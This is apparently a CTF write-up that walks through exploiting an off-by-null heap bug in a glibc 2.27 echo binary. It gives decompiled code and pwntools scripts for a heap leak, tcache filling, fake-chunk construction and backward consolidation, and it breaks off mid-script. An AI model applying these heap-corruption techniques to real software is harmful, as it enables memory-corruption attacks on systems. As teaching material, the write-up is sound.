Skip to the content.

— Uh… I th- I think my voice is annoying.
— It is, and it’s your best quality.

— Rick & Morty, 3x06, Rest and Ricklaxation.

A few days ago I started a new challenge on this website which I am going to censor right away for obvious reasons. It was a really great experience so I think I’m going to post how I solved it. Because I don’t want to discourage advanced heap exploiters, I will say that this challenge had only seven solvers in approximately five years. But, since this is my first time doing a real heap challenge, I might as well take a somewhat basic perspective (mostly because that was my perspective while solving it). I haven’t read many heap writeups so I don’t really know of techniques or anything (and I expect everyone to notice it), I just did what occurred to me at the moment. Because of all this I believe this post may be a good starting point for heap beginners like me and, at the same time, interesting for advanced people. The challenge uses glibc 2.27, which I guess means something to heap folks.

Well, getting to it, we got a PIE binary, with canary (stack protector) and full RELRO. The source code for the binary is undisclosed but with IDA we can easily decompile the binary into C:

int __cdecl main(int argc, const char argv, const char envp)
{
    __int64 v3; // rax
    ssize_t v4; // r15
    _BYTE *v5; // rbx
    char v6; // al
    char v7; // dl
    char v9[512]; // [rsp+0h] [rbp-248h]
    char v10; // [rsp+200h] [rbp-48h]
    unsigned __int64 v11; // [rsp+208h] [rbp-40h]

    v11 = __readfsqword(0x28u);
    setvbuf(stdin, 0LL, 2, 0LL);
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stderr, 0LL, 2, 0LL);
    memset(v9, 0, sizeof(v9));
    v10 = 0;
    while ( 1 )
    {
        v4 = read(0, v9, 0x200uLL);
        if ( v4 <= 0 )
            return 0;
        v5 = malloc(strlen(v9));
        if ( !v5 )
            return 0;
        if ( v4 )
        {
            v6 = v9[0];
            if ( v9[0] )
            {
                *v5 = v9[0];
                if ( v6 == 10 )
                {
                    v3 = 0LL;
                    LABEL_3:
                    v5[v3 + 1] = 0;
                }
                else
                {
                    v3 = 0LL;
                    while ( ++v3 != v4 )
                    {
                        v7 = v9[v3];
                        if ( !v7 )
                            break;
                        v5[v3] = v7;
                        if ( v7 == 10 )
                            goto LABEL_3;
                    }
                }
            }
        }
        __printf_chk(1LL, &unk_AA4, v5);
        free(v5);
    }
}

After a bit of manipulation (and maybe a bit of manhandling) I can get something a bit more intelligible:

int main(int argc, char** argv)
{
    __int64 i; // rax
    ssize_t r; // r15
    _BYTE *ptr; // rbx
    char buf[513]; // [rsp+0h] [rbp-248h]
    unsigned __int64 canary; // [rsp+208h] [rbp-40h]
    canary = __readfsqword(0x28u);

    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);

    memset(buf, 0, sizeof(buf));
    buf[sizeof(buf) - 1] = '\0';

    while(1)
    {
        if((r = read(0, buf, sizeof(buf) - 1)) <= 0) return 0;
        if((ptr = malloc(strlen(buf))) == NULL) return 0;

        if(buf[0] != '\0')
        {
            ptr[0] = buf[0];
            i = 0;
            if(buf[0] != '\n')
            {
                while(++i != r)
                {
                    if(buf[i] != '\0')
                        break;
                    ptr[i] = buf[i];
                    if(buf[i] == '\n')
                        ptr[i + 1] = 0;
                }
            }
            else
                ptr[1] = '\0';
        }
        printf("%s", ptr);
        free(ptr);
    }
}

Why hello, echo program. Roughly what this program does is read from fd 0 into a stack buffer, allocates a chunk, copies from the stack buffer into the chunk (as a string —although null terminator not included), prints the chunk’s contents with printf() and finalizes the loop freeing the chunk. No UAF, no 2free. It is important to notice that the stack buffer is initialized to nullbytes in order to prevent us from leaking any address that the glibc initialization process may have left there. It’s also worth noting the placement of a nullbyte at the buffer’s 513th byte protecting any information that may be beyond the end of the buffer (as if there were any).

The speed of sound is finite too (or analyzing bugs)

Off by null

So, the program copies bytes from the stack buffer to the malloc()‘ed chunk till the end of the string (i. e. when a nullbyte is found), or when all bytes read from the current request have been copied. But there is one thing that stands out to the eye: the fact that after every newline a nullbyte is added, and this is done unconditionally: even if the newline was at the end of the chunk this nullbyte will be placed beyond the chunk’s end. This bug is called “off-by-null”, a special case of the off-by-one bug. Since malloc() lets the program use next chunk’s prev_size field to store data, we can overflow from there and overwrite next chunk size’s least significative byte with a NUL. This will have two effects: clear the PREV_INUSE bit and shrink the next chunk to a size multiple of 0x100 if it wasn’t already.

No null terminator

A nullbyte is placed in the heap chunk only after each newline (and if there is another character after that newline the nullbyte will get overwritten), so we can very easily avoid placing a null terminator in the heap chunk, which will allow us to leak information from this chunk.

Buffer not cleaned and no null terminator between requests

Between requests the buffer isn’t cleaned, and there is no null terminator inserted into the stack buffer after a read is made, which makes possible that strlen() returns a size different than what is actually going to be copied.

Measuring the speed of sound (or first tests)

With gef’s heap bins command it’s very easy to see that every allocation we make is ending up in the tcache, and that makes sense since the maximum size we may ask is 0x210 (introducing 0x200 = 512 bytes), and the range for tcache is from 0x20 till 0x410. Let’s look at the beginning of the free() source code:

    size = chunksize (p);

    // [...]

#if USE_TCACHE
    {
        size_t tc_idx = csize2tidx (size);

        if (tcache
            && tc_idx < mp_.tcache_bins
            && tcache->counts[tc_idx] < mp_.tcache_count)
        {
            tcache_put (p, tc_idx);
            return;
        }
    }
#endif

So the tcache is the first option, and we can’t escape from it. Also, once we reserve a chunk of a certain size we are stuck with it for, since then, every time we try to allocate that same size we are going to end up with that same chunk taken from the tcache, because the tcache also has priority within malloc():

#if USE_TCACHE
    /* int_free also calls request2size, be careful to not pad twice.  */
    size_t tbytes;
    checked_request2size (bytes, tbytes);
    size_t tc_idx = csize2tidx (tbytes);

    MAYBE_INIT_TCACHE ();

    if (tc_idx < mp_.tcache_bins
        && tcache
        && tcache->entries[tc_idx] != NULL)
    {
        return tcache_get (tc_idx);
    }
#endif

So we can only place chunks in the tcache, one chunk per bin. Hmmm, that seems like a brutal limitation, doesn’t it?

Let’s see how this bins are managed:

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

They are maintained in a single-linked, non-circular, list. This also means no leak, because with only one chunk in the bin it will have just a NULL pointer (for it is the last chunk of the list and it isn’t circular).

Better together (or linking two chunks in a tcache bin)

So we may as well examine our options here. The only thing we really have right now that can give us any advantage is the off-by-null which, as we said earlier, shrinks the size to a multiple of 0x100. Huh, we may as well allocate a legitimate 0x100 chunk and let it go to the tcache’s bin for 0x100 and allocate another chunk with size between 0x100 and 0x200 (e. g. 0x1f0) and shrink it to 0x100, sending it also to the 0x100 tcache bin.

We now have at the beginning of this chunk a heap address begging, crying desperately for attention, and we’re gonna have to leak it, I still don’t know how are we going to use it, but I can safely assert that it will be of use. Only we got to deal first with a bit of a nuisance: in order to allocate a 0x100 chunk we need to write to the program a string with a length in the interval [0x100-23, 0x100-8], which means we will —without a doubt— overwrite the first 8 bytes, where this address lives.

It may be interesting to consider that doing this with a chunk with size 0x20 wouldn’t be a problem at all… with a string of one character the program would make malloc(1), which would give a chunk of size 0x20, and we’d just overwrite the least significant byte of the address. We have one little problem, 0x20 isn’t multiple of 0x100, and we can only turn chunks’ sizes into multiples of 0x100 (because this is an off-by-null, not any off-by-one). Heck, we could convert a chunk with size below 0x100 into one with size 0x00, but that isn’t a good idea because free() does this checks before considering the tcache:

    /* Little security check which won't hurt performance: the
       allocator never wrapps around at the end of the address space.
       Therefore we can exclude some size values which might appear
       here by accident or by "design" from some intruder.  */
    if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
        || __builtin_expect (misaligned_chunk (p), 0))
        malloc_printerr ("free(): invalid pointer");
    /* We know that each chunk is at least MINSIZE bytes in size or a
       multiple of MALLOC_ALIGNMENT.  */
    if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
        malloc_printerr ("free(): invalid size");

So close and yet too far, like her hand…. If only I could extend mine and reach it.

When did I say that? (or leaking a heap address)

Wait, hang on a second. The while loop copies only the bytes just read(), but the allocation is performed with strlen() and, if we don’t want to, there won’t be any nullbyte placed in the stack buffer. So we can send first a 0xf8 sized string, which will just sit in the buffer. This will allocate the chunk and overwrite it, yes, but nothing will change heap-wise taking into account that it will be freed right away and placed again in the tcache, linked again to the other chunk. Now we can simply send one non-null byte, strlen() will pick the whole string (the one with length 0xf8 that is already in the buffer), but the while loop will only copy one byte, so we will lose only one byte, the least significant one, which in fact doesn’t hold any information about ASLR.

Before I show you the script let me point out that we’re gonna have to sleep() between writes to prevent them from mixing together. We could read() each response (and make this a much more civilized conversation with both programs really in sync), but that would mean to determine how much will the program print for every request… And since the program doesn’t prompt actively for data we can’t use readuntil().

from pwn import *

r = process("./binary")
deltat = .05

# Allocate 0x100 chunk (placed in 0x100 bin).
r.write(b"A" * (0x100 - 8)); sleep(deltat)
# Allocate 0x1f0 chunk (placed in 0x1f0 bin).
r.write(b"A" * (0x1f0 - 8)); sleep(deltat)
# Allocate 0x100 chunk again and overflow into the 0x1f0 one, change its size
# from 0x1f0 to 0x100. The 0x100 will be placed back into the 0x100 bin.
r.write(b"A" * (0x100 - 8 - 1) + b'\n' + b'\0'); sleep(deltat)
# Allocate 0x1f0 chunk again, when freed will be placed in _0x100_ tcache bin.
r.write(b"A" * (0x1f0 - 8)); sleep(deltat)
# Fill stack buffer with a 0x100-8 = 0xf8 sized string.
# This will allocate and free the 0x1f0 chunk, but will be placed
# back into the 0x100 tcache bin, changing nothing heap-wise.
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat) # Pre-fill stack buffer
r.write(b"A") # Write only one byte and leak!
leak = int.from_bytes(r.read()[-6:], "little")
print("Leak: 0x%x" % leak)

This will do the trick and earn us a heap address:

$ python x.py
[+] Starting local process './binary': pid 14053
Leak: 0x5649afe98241

Knowing the heap’s base address we can find the offset inside it of the address we are leaking:

0x5649afe98241 - 0x5649afe98000 = 0x241

And this offset will be constant across executions, so we can use it to find the heap base address

heap = leak - 0x241

I just want to point out that that 0x41 is the ‘A’ we are introducing, which is overwriting the address’ original least significant byte, but it doesn’t matter, it’s just an offset, it doesn’t contain any information, it constitutes one of the not randomized parts of the address.

Breaking free (or filling a tcache bin)

After a bit of celebration we must return to the crude reality, this was just the first in the long and twisted checklist that binary exploitation constitutes. So… next step: we want to leak a libc address, so tcache won’t be enough (because no chunk will ever have a pointer to the libc), thereby we need to break free() from this prison. As we saw earlier, the necessary conditions for free() to put a chunk into the tcache are:

from pwn import *

r = process("./binary")
deltat = .05

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
r.write(b"A" * (0x1a0 - 8) + b"\0"); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat) # Pre-fill stack buffer
r.write(b"A"); sleep(deltat)
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

We are now allocating six chunks with different sizes, otherwise we would just allocate and release the same chunk back and forth six times. Then from each one of them we will overflow into the next one, changing their size field to 0x100. Once every chunk is allocated to be overflowed and freed they all will be in the tcache bin for 0x100, filling it (the last one doesn’t need to be overflowed). Notice also that the offset of the address we leak from the heap had to be adjusted, from 0x241 to 0xa41. With gdb + gef we can check that we indeed have filled the tcache bin for 0x100:

Tcachebins[idx=14, size=0x100] count=7  ←  Chunk(addr=0x555555604c70, size=0x100, flags=)  ←  Chunk(addr=0x555555604ac0, size=0x100, flags=)  ←  Chunk(addr=0x555555604900, size=0x100, flags=)  ←  Chunk(addr=0x555555604730, size=0x100, flags=)  ←  Chunk(addr=0x555555604550, size=0x100, flags=)  ←  Chunk(addr=0x555555604360, size=0x100, flags=)  ←  Chunk(addr=0x555555604260, size=0x100, flags=PREV_INUSE)

Perfect! Look at that 7. That’s a 7 like no other I have ever seen before. This is how progress looks like, like a beautiful counter showing off a breathtaking 7.

Unsorting things out (or placing a chunk in the unsorted bin)

Let’s just don’t get carried away and see what happens when the tcache for a specific size is full.

#if USE_TCACHE
    {
        size_t tc_idx = csize2tidx (size);

        if (tcache
            && tc_idx < mp_.tcache_bins
            && tcache->counts[tc_idx] < mp_.tcache_count)
        {
            tcache_put (p, tc_idx);
            return;
        }
    }
#endif

    /*
        If eligible, place chunk on a fastbin so it can be found
        and used quickly in malloc.
    */

    if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
    // [...]

    /*
        Consolidate other non-mmapped chunks as they arrive.
    */

    else if (!chunk_is_mmapped(p)) {

        nextchunk = chunk_at_offset(p, size);

        /* Lightweight tests: check whether the block is already the
           top block.  */
        if (__glibc_unlikely (p == av->top))
            malloc_printerr ("double free or corruption (top)");
        /* Or whether the next chunk is beyond the boundaries of the arena.  */
        if (__builtin_expect (contiguous (av)
                              && (char *) nextchunk
                              >= ((char *) av->top + chunksize(av->top)), 0))
            malloc_printerr ("double free or corruption (out)");
        /* Or whether the block is actually not marked used.  */
        if (__glibc_unlikely (!prev_inuse(nextchunk)))
            malloc_printerr ("double free or corruption (!prev)");

        nextsize = chunksize(nextchunk);
        if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
            || __builtin_expect (nextsize >= av->system_mem, 0))
            malloc_printerr ("free(): invalid next size (normal)");

        /* consolidate backward */
        if (!prev_inuse(p)) {
            prevsize = prev_size (p);
            size += prevsize;
            p = chunk_at_offset(p, -((long) prevsize));
            unlink(av, p, bck, fwd);
        }

        if (nextchunk != av->top) {
            /* get and clear inuse bit */
            nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

            /* consolidate forward */
            if (!nextinuse) {
                unlink(av, nextchunk, bck, fwd);
                size += nextsize;
            } else
                clear_inuse_bit_at_offset(nextchunk, 0);

            /*
                Place the chunk in unsorted chunk list. Chunks are
                not placed into regular bins until after they have
                been given one chance to be used in malloc.
            */

            bck = unsorted_chunks(av);
            fwd = bck->fd;
            if (__glibc_unlikely (fwd->bk != bck))
                malloc_printerr ("free(): corrupted unsorted chunks");
            p->fd = fwd;
            p->bk = bck;
            if (!in_smallbin_range(size))
            {
                p->fd_nextsize = NULL;
                p->bk_nextsize = NULL;
            }
            bck->fd = p;
            fwd->bk = p;

            set_head(p, size | PREV_INUSE);
            set_foot(p, size);

            check_free_chunk(av, p);
        }

        /*
            If the chunk borders the current high end of memory,
            consolidate into top
        */

        else {
            size += nextsize;
            set_head(p, size | PREV_INUSE);
            av->top = p;
            check_chunk(av, p);
        }
        // [...]
    }

Ok, that’s a good percentage of all the code for free(), so let’s just go step by step.

We have first what we saw earlier, it checks how the tcache is doing. Since the bin for 0x100 will be full (tcache->counts[tc_idx] < mp_.tcache_count) nothing will be done here. Next checks if the chunk has size in the range for fastbin, which it doesn’t (for fastbin is <= 0x80), finally checks if it is mmapped, which isn’t (we aren’t allocating sizes so damned big to trigger an mmap()). So it performs a couple more of security checks, and merges the chunk with the contiguous ones it they are free. Finally, if the next contiguous chunk was not the top chunk, inserts the chunk into the unsorted bin.

Therefore, if now we were to free another 0x100 sized chunk —as long as the next one isn’t top— it will be first placed into the unsorted bin (since it is in the range of smallbin and exceeds the size for fastbin). The unsorted bin is a double and circular linked list, hence this chunk will contain a couple of pointers to the libc that we can leak. But we can’t allocate a 0x100 chunk because it would be taken from the tcache, and when freed just placed back into it; no, we need to repeat the same process one more time…, I know, I know, and I don’t think this is going to be the last time we use that resource. Who would have thought that an off-by-null could be so powerful.

from pwn import *

r = process("./binary")
deltat = .05

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
r.write(b"A" * (0x1a0 - 8) + b"\0"); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat) # Pre-fill stack buffer
r.write(b"A"); sleep(deltat)
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
r.write(b"A" * (0x20 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
r.write(b"A" * (0x110 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (overflowing)")
r.write(b"A" * (0x20 - 9) + b'\n' + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
r.write(b"A" * (0x110 - 8) + b'\0'); sleep(deltat)

r.interactive()

Two things: First, we need to create a chunk previous to the one we are going to place into the unsorted bin because we need a new chunk to overflow from. This is because the topmost chunk right now (except the top chunk, obviously) is one with true size 0x1a0, but it is in the tcache bin for 0x100. So if we want to overflow it we need to send a string with length 0x1a0, but that won’t give us that chunk because it is placed in the 0x100 bin!

Running this script will make the program scream pretty hard: “free(): invalid next size (normal)”, and abort. What’s going on? Well, if we look again into free()’s source code

    else if (!chunk_is_mmapped(p)) {

        nextchunk = chunk_at_offset(p, size);

        /* Lightweight tests: check whether the block is already the
           top block.  */
        if (__glibc_unlikely (p == av->top))
            malloc_printerr ("double free or corruption (top)");
        /* Or whether the next chunk is beyond the boundaries of the arena.  */
        if (__builtin_expect (contiguous (av)
                              && (char *) nextchunk
                              >= ((char *) av->top + chunksize(av->top)), 0))
            malloc_printerr ("double free or corruption (out)");
        /* Or whether the block is actually not marked used.  */
        if (__glibc_unlikely (!prev_inuse(nextchunk)))
            malloc_printerr ("double free or corruption (!prev)");

        nextsize = chunksize(nextchunk);
        if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
            || __builtin_expect (nextsize >= av->system_mem, 0))
            malloc_printerr ("free(): invalid next size (normal)");

we see that those checks really mean something and do exist for some reason (and that we’d probably do something ‘bout ‘em). The specific problem we are facing currently is that, by shrinking the chunk to be 0x100 sized, free() will look for the next chunk at the offset 0x100, but our true chunk’s size is 0x110, so it will find whatever we placed at that position (surely 0x4141414141414141), and that clearly isn’t a valid size for a chunk (too large).

Have you ever faked it? (or faking chunks 101)

Fair enough. We place a valid size there and done, right? It’s offset 0x100 till the next chunk, but this is from the headers, and we start writing 0x10 bytes beyond the header, so we would need to write at offset 0x100 - 0x10 = 0xf0, but the field size is 8 bytes further, so 0xf8. Now, what is a valid size? Not too big, not too small. Let’s make it the smallest possible, MINSIZE, which in 64-bit architectures is defined as 0x20. On the other hand, free() also checks that the chunk it is freeing is truly in use by making sure that the next chunk’s size’s PREV_INUSE bit is set, so we are going to place 0x21 as the fake chunk’s size.1

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
r.write(b"A" * (0x20 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# Write the minimum amount necessary to allocate this size, because we are going
# to use the NULs that are there or we're gonna end up with a size too great.
r.write(b"A" * (0x110 - 23) + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (overflowing)")
r.write(b"A" * (0x20 - 9) + b'\n' + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# This will place 0x21 in the fake next size
r.write(b"A" * 0xf8 + p8(0x21) + b'\0'); sleep(deltat)

Now the program just explodes, segmentation fault. Why? With gdb we can see where it breaks

$rax   : 0xa41414141414141  ("AAAAAAA\n"?)
$r12   : 0x0000555555604e30  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r13   : 0xf5bf1414141f0cdf
$r14   : 0xa41414141414241  ("ABAAAAA\n"?)

   0x7ffff7897cab <free+859>       mov    rax, QWORD PTR [r12-0x10]
   0x7ffff7897cb0 <free+864>       sub    r13, rax
   0x7ffff7897cb3 <free+867>       add    r14, rax
 → 0x7ffff7897cb6 <free+870>       mov    rsi, QWORD PTR [r13+0x8]

r12 points to the data zone of our chunk, and the first instruction is picking up the field prev_size from our header. r13 was pointing to our headers, so decreasing it by prev_size would make it point to the headers of the previous chunk, if only that prev_size were real…, unfortunately we’ve just overflowed from there into the size field, so we have 0xa41414141414141 as prev_size, hmmm that can’t be healthy. It then dereferences r13 trying to access the previous chunk’s size, which obviously segfaults. What is happening exactly? Why is this happening to me?

Why does it happen to me, I dunno, but this is what’s happening exactly:

        /* consolidate backward */
        if (!prev_inuse(p)) {
            prevsize = prev_size (p);
            size += prevsize;
            p = chunk_at_offset(p, -((long) prevsize));
            unlink(av, p, bck, fwd);
        }

By overwriting the least significant byte of our chunk’s size with a NUL we marked the previous one as free, and thus tries to merge them. But what is the problem? The previous chunk is free for real, I promise! The problem is that when a tcache chunk (or fastchunk) is freed, free() doesn’t place its size in the prev_size of the next one; it also doesn’t clear the PREV_INUSE bit in the size of the next one —precisely to avoid this exact problem. We could just place the size of the previous chunk in our prev_size after overflowing, something like this

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
r.write(b"A" * (0x20 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# Write the minimum amount necessary to allocate this size, because we are going
# to use the NULs that are there or we're gonna end up with a size too great.
r.write(b"A" * (0x110 - 23) + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (overflowing)")
r.write(b"A" * (0x20 - 9) + b'\n' + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (placing nulls)")
r.write(b"A" * (0x20 - 10) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 11) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 12) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 13) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 14) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 15) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 16) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 16) + p8(0x20) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# This will place 0x21 in the fake next size
r.write(b"A" * 0xf8 + p8(0x21) + b'\0'); sleep(deltat)

but now we break only a bit later, because it’s dereferencing the fwd pointer of the previous chunk, and it just seems that this problems are never going to end (my life is exactly the same but, I can’t do anything about it), so we better just pause for a second and analyze the situation. Let’s see how unlink() works (I’ll remove the largebin part because it doesn’t apply to us).

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
        malloc_printerr ("corrupted size vs. prev_size");                     \
    FD = P->fd;                                                               \
    BK = P->bk;                                                               \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     \
        malloc_printerr ("corrupted double-linked list");                     \
    else {                                                                    \
        FD->bk = BK;                                                          \
        BK->fd = FD;                                                          \
        if (!in_smallbin_range (chunksize_nomask (P))                         \
            // [...]
    }                                                                         \
}

Well, it seems like we are going to have to put our hands to work and create one hell of a chunk, with valid pointers that point to other chunks that point to our fake one and all. Well, we have a heap leak, that must be enough (told ya we would use it), but first we need to develop a primitive to write data to a chunk with as many nullbytes as we want. This is gonna be cool.

I’ll say whatever I want (or how to place nil bytes, just ‘cause nihilism)

Let’s say we want to write (with ‘0’ denoting nullbytes)

AAAAAA00BBBBBB0CCC

After filling up the stack buffer to the size of the chunk we want to write this in, we write padding till the last nullbyte, surpassing it, and then followed by the rest of the data.

AAAAAA00BBBBBB0CCC (what we want to write)
XXXXXXXXXXXXXXXCCC (what we write in the 1st step)

Now we place the nullbyte where we want it with a newline (denoted by ‘n’)

AAAAAA00BBBBBB0CCC (what we want to write)
XXXXXXXXXXXXXXXCCC (what we currently have in the chunk)
XXXXXXXXXXXXXn     (what we write in the 2nd step)
XXXXXXXXXXXXXn0CCC (what we have in the chunk after this step)

Repeat for each nullbyte, season to taste and it will be ready to be served.

AAAAAA00BBBBBB0CCC (what we want to write)
XXXXXXXXXXXXXn0CCC (what we currently have in the chunk)
XXXXXXXXBBBBBB     (what we write in the 3rd step)
XXXXXXXXBBBBBB0CCC (what we have in the chunk after this step)

Adding a simple check to make it more versatile, we have the following.

def create_chunk(size, contents = None):
    # Fill buffer with a string with desired size for strlen()
    r.write(b"X" * (size - 0x8) + b'\0'); sleep(deltat)
    if(contents is None): return

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        # Write what goes between the null we are considering now, and the
        # one we considered the last iteration
        if len(contents[idx + 1:previdx]) != 0:
            r.write(b"Y" * (idx + 1) + contents[idx + 1:previdx]); sleep(deltat)
        # Place the null where it belongs
        r.write(b"Z" * (idx - 1) + b'\n'); sleep(deltat)
        previdx = idx
    r.write(contents[:previdx]); sleep(deltat)

Using this new toy we can rewrite our script.

from pwn import *

r = process("./binary")
deltat = .05

def create_chunk(size, contents = None):
    # Fill buffer with a string with desired size for strlen()
    r.write(b"X" * (size - 0x8) + b'\0'); sleep(deltat)
    if(contents is None): return

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        # Write what goes between the null we are considering now, and the
        # one we considered the last iteration
        if len(contents[idx + 1:previdx]) != 0:
            r.write(b"Y" * (idx + 1) + contents[idx + 1:previdx]); sleep(deltat)
        # Place the null where it belongs
        r.write(b"Z" * (idx - 1) + b'\n'); sleep(deltat)
        previdx = idx
    r.write(contents[:previdx]); sleep(deltat)

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
create_chunk(0x100)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    create_chunk(0x1f0 - (i * 0x10))
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
create_chunk(0x1a0); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
create_chunk(0x100, b"A")
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
create_chunk(0x20)
log.info("Allocating 0x110")
data  = b''
data += b"A" * (0x100 - 0x8)
data += p64(0x21) # Size of our fake next chunk
create_chunk(0x110, data)

log.info("Allocating 0x20 (overflowing)")
data  = b''
data += b"A" * (0x20 - 0x10)
data += p64(0x20) # 0x110 chunk's prev_size
data += b'\0'     # Off-by-null into 0x110 chunk's size
create_chunk(0x20, data)

log.info("Allocating 0x110")
r.write(b"A" * (0x20 - 8 + 1)) # Reach nullbyte introduced when allocating 0x20

r.interactive()

Now let’s pick up where we left it, yes?

Do you like it from behind? (or how to consolidate backwards)

Currently we are only creating partial fake chunks, but we need to ensure that the backward consolidation works fine and that it won’t try to consolidate forward (or make sure to do it correctly too, but that probably won’t be necessary).

Looking again at unlink():

    FD = P->fd;                                                               \
    BK = P->bk;                                                               \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     \
        malloc_printerr ("corrupted double-linked list");                     \

It checks that the chunk being unlinked is the next to its previous and the previous to its next, which indisputably makes sense. The simplest circularly-linked lists are those with only one sole and lone element (how redundant’s that sentence?), which has itself as previous and next (lol I’ve never thought of me as a circularly-linked list).

It’s important to take into account that we can’t use the true previous chunk because when put back to the tcache its fwd pointer will be overwritten with a NULL, so we will need to make a complete fake chunk inside the true previous one. Making this fake chunk the smallest possible it will be of size 0x20, which means that the actual previous chunk must have (at least) size 0x30.

log.info("Allocating 0x30 (overflowing)")
data  = b''
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size <----+
data += p64(0x21)               # size           |
data += p64(heap + 0xe10)       # ---------------+
data += p64(heap + 0xe10)
data += p64(0x20) # Next's prev size
data += b'\0'     # Off by null into next's size
create_chunk(0x30, data)

We are making a fake previous chunk with size 0x20 linked against itself. The heap offsets were obtained empirically with gdb.2

Now that the backward consolidation has been dealt with we can move forward to the forward consolidation. So the partial fake next chunk we built earlier has to be marked as in use, that means that its next chunk has to have the PREV_INUSE bit set. Well, the legitimate next chunk (in our case the top chunk) does have the PREV_INUSE bit set, so we can use it. So, at offset 0xf0 we’d place a chunk, which we are going to make the smallest possible too, 0x20, and we can’t place only the headers because 0x20 bytes further we need the legit next chunk. This means that our chunk has to be of size 0x120 (0xf0 + 0x20 + our own headers).

### Insert a chunk in unsorted ###
log.info("Allocating 0x30")
create_chunk(0x30)
log.info("Allocating 0x120")
data  = b''
data += b"A" * (0x100 - 0x10)
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size
data += p64(0x21)               # size
data += b"A" * 0x10
create_chunk(0x120, data)

log.info("Allocating 0x30 (overflowing)")
data  = b''
